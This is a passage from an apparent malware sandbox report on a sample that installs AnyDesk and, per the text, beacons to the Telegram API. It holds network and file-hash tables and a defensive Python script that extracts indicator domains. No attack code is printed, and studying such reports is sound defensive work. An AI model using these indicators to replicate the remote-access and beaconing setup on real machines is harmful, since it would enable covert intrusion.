| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| NL | 142.250.102.84:443 | accounts.google.com | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 104.19.130.98:443 | stats00main3831.spankbang.com | tcp |
| US | 104.19.130.98:443 | stats00main3831.spankbang.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| GB | 89.187.167.4:443 | a.magsrv.com | tcp |
| GB | 89.187.167.4:443 | a.magsrv.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.5.5:443 | tb.sb-cd.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.19.131.98:443 | stats00main3831.spankbang.com | tcp |
| US | 8.8.8.8:53 | 166.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 172.64.147.206:443 | go.xlviirdr.com | tcp |
| GB | 195.181.164.15:443 | a.magsrv.com | tcp |
| GB | 195.181.164.15:443 | a.magsrv.com | tcp |
| US | 104.18.176.151:443 | impactserving.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| NL | 95.211.229.248:443 | s.magsrv.com | tcp |
| NL | 95.211.229.248:443 | s.magsrv.com | tcp |
| GB | 89.187.167.7:443 | s3t3d2y8.afcdn.net | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 104.18.40.50:443 | go.xlviirdr.com | tcp |
| US | 172.64.147.206:443 | go.xlviirdr.com | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 8.8.8.8:53 | 50.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | vstream-15.sb-cd.com | udp |
| DE | 156.146.33.59:443 | vstream-15.sb-cd.com | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 104.18.40.50:443 | creative.mnaspm.com | tcp |
| US | 8.8.8.8:53 | 59.33.146.156.in-addr.arpa | udp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| DE | 108.138.36.13:443 | video.saawsedge.com | tcp |
| US | 104.17.11.106:443 | img.strpst.com | tcp |
| US | 104.17.118.12:443 | strp.chat | tcp |
| US | 104.17.118.12:443 | strp.chat | tcp |
| US | 8.8.8.8:53 | 196.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.36.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.11.17.104.in-addr.arpa | udp |
| US | 54.230.228.127:443 | edge-hls.doppiocdn.net | tcp |
| GB | 216.58.201.99:443 | id.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| FR | 172.217.20.206:443 | encrypted-tbn2.gstatic.com | tcp |
| FR | 172.217.20.206:443 | encrypted-tbn2.gstatic.com | tcp |
| DE | 108.138.36.24:443 | cdn.britannica.com | tcp |
| FR | 172.217.20.206:443 | encrypted-tbn2.gstatic.com | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:38674 | | udp |
| N/A | 239.255.102.18:12440 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:5563 | | udp |
| N/A | 239.255.102.18:25391 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:8214 | | udp |
| N/A | 239.255.102.18:30489 | | udp |
| DE | 18.66.192.109:80 | api.playanext.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:51227 | | tcp |
| FR | 216.58.215.36:443 | www.google.com | udp |
| FR | 216.58.215.36:443 | www.google.com | udp |
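Most of the Network table is sandbox background: reverse-DNS lookups to 8.8.8.8, mDNS and other multicast, Google and ad-network traffic from the Edge sessions, and the browsing the script itself opens. The destinations a responder actually needs are the AnyDesk bootstrap and relay hosts, api.telegram.org (the target of the curl beacon in the process list), and a few third-party services such as gofile.io and cdn.iplogger.org. The script below is an added example, not part of this report: it parses a constructed subset of the table rows in their markdown form, tolerates rows whose Proto value has slipped into the Domain column, drops lookups, multicast, loopback and an analyst-supplied allowlist of background domains (that allowlist is an assumption for this example, not something the report states), deduplicates what remains and labels each destination only as far as the domain itself supports. Anything it cannot label is left for review rather than guessed.

```python
"""Pull the destinations worth acting on out of this report's Network table
(added example, not part of the report): parse the markdown rows, including
misaligned ones, drop lookups/multicast/loopback and an analyst-supplied
allowlist of background browser traffic, and label what is left."""
import ipaddress
import re

# Constructed sample: rows copied from the Network table above, including two
# of the misaligned rows where the Proto value sits in the Domain column.
SAMPLE_ROWS = """\
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 104.21.4.208:443 | cdn.iplogger.org | tcp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| NL | 185.229.191.44:443 | boot.net.anydesk.com | tcp |
| GB | 195.181.165.153:443 | relay-79bdf984.net.anydesk.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:51227 | tcp | |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
"""

# Assumption: which suffixes count as sandbox/browser background noise is an
# analyst decision; this list is the one used for this example only.
NOISE_SUFFIXES = ("google.com", "gstatic.com", "doubleclick.net", "cloudflareinsights.com", "identrust.com")
# Roles are stated only as far as the domain itself supports them.
ROLES = {
    "anydesk.com": "remote access (AnyDesk bootstrap/relay)",
    "telegram.org": "Telegram Bot API (target of the curl beacon)",
    "gofile.io": "file hosting service",
    "iplogger.org": "IP logging service",
}
_ROW_RE = re.compile(r"^\|\s*([^|]*?)\s*\|\s*([^|]*?)\s*\|\s*([^|]*?)\s*\|\s*([^|]*?)\s*\|$")

def parse_row(line: str):
    """One markdown row -> dict, or None for the header, separators and non-rows."""
    m = _ROW_RE.match(line.strip())
    if not m:
        return None
    country, dest, domain, proto = m.groups()
    if domain in ("tcp", "udp") and not proto:   # misaligned row: proto landed in Domain
        domain, proto = "", domain
    ip, _, port = dest.rpartition(":")
    if not port.isdigit():
        return None
    return {"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto}

def _matches(domain: str, suffix: str) -> bool:
    return domain == suffix or domain.endswith("." + suffix)

def is_noise(entry: dict) -> bool:
    """Reverse-DNS lookups, multicast/loopback and allowlisted background traffic."""
    addr = ipaddress.ip_address(entry["ip"])
    if addr.is_multicast or addr.is_loopback or entry["domain"].endswith(".in-addr.arpa"):
        return True
    return any(_matches(entry["domain"], s) for s in NOISE_SUFFIXES)

def role_for(domain: str) -> str:
    for suffix, role in ROLES.items():
        if _matches(domain, suffix):
            return role
    return "unclassified (review)"

def extract_iocs(table_text: str) -> list:
    """Deduplicated, noise-free destinations with a role label, in table order."""
    seen, iocs = set(), []
    for line in table_text.splitlines():
        entry = parse_row(line)
        if entry is None or is_noise(entry):
            continue
        key = (entry["domain"], entry["ip"], entry["port"], entry["proto"])
        if key in seen:
            continue
        seen.add(key)
        iocs.append({**entry, "role": role_for(entry["domain"])})
    return iocs

if __name__ == "__main__":
    for ioc in extract_iocs(SAMPLE_ROWS):
        print(f"{ioc['domain'] or ioc['ip']:35} {ioc['ip']}:{ioc['port']}/{ioc['proto']}  {ioc['role']}")
```

Dedup keys on domain, IP, port and protocol rather than domain alone, so the two AnyDesk relay hosts and the repeated gofile.io rows collapse correctly while a host that appears over both tcp and udp keeps both entries; api.twitter.com deliberately falls into the review bucket, since the table alone does not say whether that traffic belongs to the sample or to the sandbox's browsing.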
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8294f1821fd3419c0a42b389d19ecfc6 |
| SHA1 | cd4982751377c2904a1d3c58e801fa013ea27533 |
| SHA256 | 92a96c9309023c8b9e1396ff41f7d9d3ff8a3687972e76b9ebd70b04e3bf223a |
| SHA512 | 372d369f7ad1b0e07200d3aa6b2cfce5beafa7a97f63932d4c9b3b01a0e8b7eb39881867f87ded55a9973abea973b2d2c9b6fc4892f81cec644702b9edb1566d |
\??\pipe\LOCAL\crashpad_2040_QLWWWWIQDYUPZTVX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 390187670cb1e0eb022f4f7735263e82 |
| SHA1 | ea1401ccf6bf54e688a0dc9e6946eae7353b26f1 |
| SHA256 | 3e6c56356d6509a3fd4b2403555be55e251f4a962379b29735c1203e57230947 |
| SHA512 | 602f64d74096d4fb7a23b23374603246d42b17cc854835e3b2f4d464997b73f289a3b40eb690e3ee707829d4ff886865e982f72155d96be6bc00166f44878062 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8495e20d6c986f883d365d0ddd04360c |
| SHA1 | f1bb805a124dae224229749e488ec02dff78f198 |
| SHA256 | ab38d5e028d0d4eb07fa6545e0230c666bbb64c5d33c60d01bc46057fa7957ee |
| SHA512 | 34d8ded0db7650be1a7da9ceea578e34ccb27a895b603385b78312875e89ac3cedade426d7269626ef62201898c5aee207b4d13a5c1f3810f2dc8296d6c9c552 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 583213f6c2e5d2492d3a852e1fd51a0c |
| SHA1 | 692e0a489cdb3a4216015b2776f85d8594dcbe77 |
| SHA256 | 67a434716e812286ee21ae0bbe4d2bb3d52bdeec939d9220388e561650b580e4 |
| SHA512 | 293245bd144f56949f9c7569615bc82aced604e790415a5fafdfd33e1e8d239cd26952e2166632aac3bf05e2f945e067198c33e832f2283ab4cc87cf159add83 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d41a8c95c6052636f7e2dc60d3c1a37d |
| SHA1 | 52b98cd3006e2748f281d021bc41a38bedc67022 |
| SHA256 | b8d626c4169bff93f4f732d8198a409f0b13e7d45398fcdf266b11270fa3f8b1 |
| SHA512 | 8a35e56ccdb074d74b09d73816ee19e81798668fe98cfce0f86d6bcb0a4c080304a44c1a0cf5260087e72b0f02fca9381658e4062c2bb609b8ad8427c100aac6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57bde1.TMP
| MD5 | 2fbefa351eba8db5437eea03c31e7a9a |
| SHA1 | 346649e79619b82848d398684583ebb7c709c292 |
| SHA256 | 1272c1df16b7b1025acf9414175a4ea22cb93314b84010d2f6890c4d6f268602 |
| SHA512 | 563e58d4b6a10ea3e739df4d147685e697f93194cb260ce5b2915d8334ea0fa86490071c22c1a59ada3ebba7c5cce0220aadecc5094963b9185f04e35b2baa60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f52063345e20b6962a5487d1cc8627f6 |
| SHA1 | a457e71e540e3501ffadbda389d7b17c612759ed |
| SHA256 | b0d73d4bacf7fb90e94ffbd9b6a8f108373b9fcd0a28f7a1df5838af8647de5c |
| SHA512 | 73cc87a7818d854aa36850b83557d0447c1917a198e026d7385dcf676766a2a2f129422b7b7a96f2c71dfeeef58e2159b60b1912bf0370cf010085662a58f9f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 7806cf72f57ee301419845b6270dec35 |
| SHA1 | ea5e13b1b7ccf6acdeffd453b26901e26073e8a4 |
| SHA256 | 12cc69764e4d4c8e4a988dad744c5edcc0a6b8f9d209981d44884ed0dbaa6672 |
| SHA512 | cf3b05ae9fb7116abbefa85486ac74b6f206360c777d8a305c59af9d4a7008de5c9e14fd45b66c6f99655c1c84aead0b0a16038d64e913c5e38210726870d876 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1ebf1391021aad511ba070febf6b358f |
| SHA1 | 893b398796fffba754c86ff2f3ba70369ca25813 |
| SHA256 | ca50f8f074b4b76f012e3f4f55ac6177d2d6b96c05bb4d6d7d91c4b3d128f86c |
| SHA512 | 2f1ee02b1ef8792db382b33900a55d51db56b9f98b425415b73db4ecf93d2c7a82732bc09d0776dbc665cc460823bd79dba37b26c841c6015e2cc8ec035cb9d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 7faa10c299d98d9786a78e096d79c9f1 |
| SHA1 | d8e9f5c26fd952bf760fede6caa86cefe1337c75 |
| SHA256 | f0a17acf2c7c7477efd928b2122448292d515fd4691a65c5da1ebb05f77187f5 |
| SHA512 | 478b6117c2c6419aefac3c9b1521e127ea35f3f0b12323a8b3eb021e4637a03af89e3fff1e1cdc0c7e173c217b5b05a9a4309fffbc51f3af95fd03b9d135997b |
C:\Users\Admin\Downloads\Unconfirmed 790594.crdownload
| MD5 | e10b6631d11b3f4aabb1256da4296588 |
| SHA1 | 2949c1316f6036b3f13d128fb048b78229c49755 |
| SHA256 | 0a2476399914219d49f77018ccaf1412811d1b8464d1bab4057bc1c1763e1ac4 |
| SHA512 | 7ecfe5fc310ebc500a7f7f7136ef5dd886ef7de35d35648a5a0d6f0a12d95c4282ab87b358a1bf151e9f7efeaddc946f5d2b7b357eee24c150baee8761136234 |
C:\Users\Admin\Downloads\Goonscript.exe:Zone.Identifier
| MD5 | f328e184c322cba91dc3c014fe2ef3e9 |
| SHA1 | 2aab1f0a70009051dcc87350e0f3b079da02fbb2 |
| SHA256 | fe25e31061b432c3a3fdd8f797c6dadad253e83dfb305ee997a7302cd70b618d |
| SHA512 | e59501b550ea64155d134ae832812004ec298a44519eb03183542599174b7691be3225f6fa5064d45ed7ec81f0a93721eb8f401d7e2a49c4b91a70ded006c97e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9439364fe21c10e7cf51c9be548f3241 |
| SHA1 | 2a1dd3e3cb1843b13c0256730cf3bc120897126c |
| SHA256 | 82f15d119e4071aad6183be78c320e20eb7335e10870762fb8ae1ad9bbd3a53c |
| SHA512 | 33dce1e6f078d3cc5c593a1ee2d230363281b1c53016a823463e970a4c71762bd82f2878500d4b7aef77f878cca8bb0708b34196f5dd779cb431431d47d9e710 |
C:\Users\Admin\AppData\Local\Temp\A067.tmp\A068.tmp\A079.vbs
| MD5 | d9c7f4fd88a8a0d08f8181c4bfd21b72 |
| SHA1 | 2c72ed965a31bd8b39013b12099b244df58fa8e1 |
| SHA256 | 65537c23d5789c2f574f961f5d34a04391ffffa4ba92a9b448f1946e7ede4a6f |
| SHA512 | f9c23cfb1550be89d1c47109491738e5471b1ed514fde58581f6769ebfd03b97ab32999d8cdb2977e60f1b166c47b2d41cbacbc78718312c638246b5ad04b78b |
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
| MD5 | af75667a7f08a01ae6d7e174922690db |
| SHA1 | bcacd4fc04d1c794dc6ad5b10fc08c4036de8680 |
| SHA256 | 35b7037d72cb861847025ffe8bb5d70eff3e88f544e8c203da2e61c0f5b9ca4d |
| SHA512 | d99b222040fb74650faceaa48543e956ccb48a3483c977b966a2807cf017e4d74f53d8c90ea6139fb3e490949a62a055827a00f3c110d2629cfe34020c9d3d10 |
C:\Users\Admin\AppData\Local\Temp\A365.tmp\A366.tmp\A367.bat
| MD5 | 01a143a4c96cd68edc098eec28b92605 |
| SHA1 | 28d4fb883af2cfcf2fc2690cb548c163fff98732 |
| SHA256 | 8864c3567c339c798f6a46a6dd17ae8f19a1fbac8f523838e926edc6251d79e5 |
| SHA512 | 9ca26669e31d25fd8b1302c9e5bb72e78612fe6158b5c497f8d69895bce81478f06d104d725b3de1767573209d7837d33ce489262c04380e3bda706cae3b4886 |
memory/220-275-0x0000022238F30000-0x0000022238F52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_whfytrtt.2h0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\Downloads\AnyDesk.exe
| MD5 | aee6801792d67607f228be8cec8291f9 |
| SHA1 | bf6ba727ff14ca2fddf619f292d56db9d9088066 |
| SHA256 | 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 |
| SHA512 | 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f |
memory/2560-288-0x0000000000720000-0x0000000001E69000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6a27e61d703d788737cf92584596b5a2 |
| SHA1 | 108beaaf554bf2f8e028bc9093b8893cecb291eb |
| SHA256 | 0950aff004ff620947dd6068963b5e7f160b94e1156c19f92b6ea5d0370879fc |
| SHA512 | ff154452278aa16a06e3178651a30007ff89c5dda976ff5c5545f620a1a859adda03e25c5cf830ea0b8f24154f79a843d2bbb5ef685d3401136b470bcbe39938 |
memory/4304-304-0x0000000000720000-0x0000000001E69000-memory.dmp
memory/2828-306-0x0000000000720000-0x0000000001E69000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 90c4364822b31bdbe3fa52fa425c112a |
| SHA1 | 23622f215e2da73f70c71c068ddaee556c8a8231 |
| SHA256 | 0a011bc61708cc9369782367d43bc82cb866f94bbf3606240cf4a9136dd072e9 |
| SHA512 | 5b9127355c99feeb93dad5624370b0c2d376d1c810612981b2e0b85b78548c71fd504e2d1f107399ce5e659135d973f215d3716cac78e9cdb61bc0298fc961b1 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | a787c308bd30d6d844e711d7579be552 |
| SHA1 | 473520be4ea56333d11a7a3ff339ddcadfe77791 |
| SHA256 | 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440 |
| SHA512 | da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 1bfa5e296281ceba8e3c55373c6e809a |
| SHA1 | 77faa7ca84ab75ac54f20a418188e9d3b0b53ee9 |
| SHA256 | 9adf1ee72fdb113d1dcc9f2bf9faed45db0026576d01aa268febd8882ec5934e |
| SHA512 | a87e5a7dbd7609259d75a0045dc91c7ce57348630a48263b7efb089a6f3799e2b79022d953fc832f50fc3d3319cb4c3084b00cb630c1e4f0f1ed2a3d6bf603e3 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 0c04ad1083dc5c7c45e3ee2cd344ae38 |
| SHA1 | f1cf190f8ca93000e56d49732e9e827e2554c46f |
| SHA256 | 6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0 |
| SHA512 | 6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 5fad878349e234af5bdfad4c1894b85c |
| SHA1 | f987b069506e27a1cc916ce16400e472d06928b4 |
| SHA256 | f653551efce38076fa80760fa9b564211a521f76f328c1f4146f75889d67a22a |
| SHA512 | 0ba7420d6b78fb25b8ba07b97f1060c1acab63b1fa008f0f20ae18c33346681ead8041f23b99b32be21587e27bbb85a2a02f9ccc1aa3a8eee7aef72df96b2eeb |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | f221e87aa559c4800264bdbd653c4aba |
| SHA1 | c3ca6c2a76b374eba43ead10a9b217c9e69bff73 |
| SHA256 | c016d704c6229686cb4ea3ba973a07ce5097422634d7ea0b678eee7431e78572 |
| SHA512 | 2b1be0167682af0befd9248674146f82958ffca35f6a3ff4a110b831a2b40c8b408feb5fe700bfd49797b326f523c0f85dad7d0d797cb314148f285a9b035ad5 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | ae23851daecaeb21f29b16fe4cb82444 |
| SHA1 | 75342415c05adf338cfeb79fa6eb6af893372b54 |
| SHA256 | c5d50079785d3dbe8bc08bc3162c6348faf3d411027840f350f7d2237c3600c8 |
| SHA512 | da562c0187e0d1a62758a6e80fddde112d29158012811138afda8313041939e4e0cf98c8ed1fb0bc2fd3f9eca3f03252f806486c909ba1cc1711b704462fed85 |
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
| MD5 | a67d6d0e626d0a77d7718161cf79b7bb |
| SHA1 | a5d5d86f7200d7a822c6265207997d96a0b71b84 |
| SHA256 | 4570a014a7c4f15c7a73af9700dd311ddc510bcc7b5a5623f70667c5859fd537 |
| SHA512 | 02fc13c38f048a4940a5ec03e85c9f1171f8f5fa2e61867f38c924e91c9f68857ef809cb7730e5b4907de783d905d891fa38bfad39ee5fbf580a3d07c29ecf35 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 99074bcf2df7414a5b080879fc05673d |
| SHA1 | d5c3f7b0b375d7743064a34afdac0cf14a3c1f02 |
| SHA256 | 03e8cfbb88d5ea5af590f6f28791183fba7a8c81575bf9c300909f5b838aa0b0 |
| SHA512 | d4d47c22c31efe9e0e4d468cc3ec494b26f3d5f8e76357d137c964e813d01356c231bbb5a02a162ce220f32f1c8141f11fa80822f20a2f82dc26ff07e00de9e8 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | a2a175f5480d4fdf42019567fb05daac |
| SHA1 | 5d59556de68cb7fed20e92ca49b963dbfad23a22 |
| SHA256 | b4fb405d6f5fd813f8895b8d0b0008b562cd8ed084a30e6ef861d8fa60fb6b90 |
| SHA512 | 9de55b947876626c2bd133ebe7cf0a094a7444b8aadd740839c80498af36dac1cd850ae2b68add6ec1dd41364a7d87476b32ed93ed526b35057540e94584c7da |
memory/4304-414-0x0000000000720000-0x0000000001E69000-memory.dmp
memory/2828-416-0x0000000000720000-0x0000000001E69000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | afdc4f69f4720b8c4153f6186f49a2b6 |
| SHA1 | 329c27ea36d7913809b0c239bb58e91d2ee468ac |
| SHA256 | 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571 |
| SHA512 | 3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de |
memory/2012-433-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | 24660b14f7ccd35b98ef6389f7da7ccd |
| SHA1 | fc295ccc11c1533490fcc5b472fdc790e6e804e1 |
| SHA256 | bb8c6bd9d83d2b727d6dc9a4665995fdd09e01ff4e8e4c0a61450e01a1cc1bcc |
| SHA512 | eb7d9f58028e6bb78a205ca75d3f99803bbe9ebc95eb792e3deb589e92d40e06b2913a01e4a4e38d79a905ee89fc554a4c8d69970aea6c63ce1e1ea41c314f4e |
memory/2560-487-0x0000000000720000-0x0000000001E69000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | 970bab2b404616a4654d7d290983f55a |
| SHA1 | 324860765bda1f57a384f73653d23a323cf743a6 |
| SHA256 | 57a25cbc2f7a6dbeaefeb23b9df44503117c8c49cb8b0f1c476ba55615b884e7 |
| SHA512 | 89bfdad64b4011017df1fe88a29603822b2ed12b6324061ec4f465f77bb54d3615ce35fa9d4b38fe894653e82f8f7f2a71466050a4b3ed6bbae9cc84fe6c1df3 |
memory/2152-535-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 51586df2d350703148f35aa09c706ff8 |
| SHA1 | bc5f45bf6aa95137625de58d538ef19b641ebfc4 |
| SHA256 | 3133ff72a18d5194467efa7937fc58b4b7e6a3cc6cfeada78f109e07fb111f14 |
| SHA512 | a91e9401522b00619024db5c7e50299bcedbf3404874c0597ee0f37dff813755833775584d4c4ec9ac0e876dac0c922b4944788283047220455669675971dff2 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 7044755137e4beaa2b0ac8bde5dd65e3 |
| SHA1 | 5b5a6bac91d97a44e75c19ca5dd43405a0787eb7 |
| SHA256 | da1a4967f89d23eda5515a7ed48eec4d83f23bb125e8bbe36034e154bfd67201 |
| SHA512 | 6f3ad72d9faa4d25605b8ae30fb63198311afb0d4e80f0a60ff7d1cfa9aff85999c2bc6764061fa5a58557ff96935a787ff8a65375161babbf4aa3bf488094d9 |
memory/4012-541-0x0000000000190000-0x00000000018D9000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | cb862df7bedc23b4e32f1f58266f75db |
| SHA1 | ca7999acb1b3e25c018b161bad0edca54d0bf56c |
| SHA256 | b5eeac895117da06089d832aaf823b93981e7466a8c635212a49cb6991b83a79 |
| SHA512 | 7043195d6406ec54ca667af1a3034b6ef86c1b489e3730f91ba1410917d2f74f76e033f80199865c7f1bc00f5fffb3ad54e06d373f6bd85aa17542d6afdbbc20 |
memory/4012-571-0x0000000000190000-0x00000000018D9000-memory.dmp
memory/1476-670-0x0000000000190000-0x00000000018D9000-memory.dmp
